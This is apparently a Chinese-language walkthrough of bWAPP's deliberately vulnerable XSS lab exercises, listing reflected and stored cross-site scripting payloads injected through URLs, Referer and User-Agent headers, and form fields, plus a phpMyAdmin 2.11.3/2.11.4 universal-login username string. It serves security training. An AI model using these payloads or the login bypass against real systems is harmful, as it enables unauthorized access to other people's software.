前言
接上篇XSS,没啥好讲的,直接看答案吧
A3 - Cross-Site Scripting (XSS)
-3.11-XSS - Reflected(phpMyAdmin)
这个看文档说是phpmyadmin上的一个BBcode的XSS,具体没复现过。
CVE-2010-4480
补充:
PHPmyadmin 2.11.3和2.11.4万能密码漏洞
只需要输入账号 密码不需要输入
利用代码如下:‘localhost’@'@”
3.12-XSS - Reflected (PHP_SELF)
用户名注入:<script>alert(1)</script>
密码注入:<script>alert(1)</script>
URL注入:
http://172.16.0.225/bWAPP/xss_php_self.php/"><script>alert(1)</script>
3.13-XSS - Reflected (Referer)
URL:
http://192.168.0.155/bWAPP/xss_referer.php
手动添加referer可以造成跨站
Referer: http://www.google.com/search?q=<script>alert(1)</script>
3.14-XSS - Reflected (User-Agent)
URL:
http://192.168.0.155/bWAPP/xss_user_agent.php
3.15-XSS – Stored (Blog)
直接在留言板处输入
<script>alert(1)</script>
3.16-XSS - Stored (Change Secret)
问题参数在bee
这个是在源码里面会有输出bee
所以我们可以抓包修改
3.17-XSS - Stored (Cookies)
XSS代码插入在了set-cookie里面,看自己怎么构造
3.18-XSS - Stored (SQLiteManage)
URL:
" >http://172.16.88.250/sqlite/?5e57f"><script>alert(1)</script>
3.19-XSS - Stored (User-Agent)
以为页面有回显user-agent的值
在页面抓包:
将user-agent改成<script>alert(1)</script>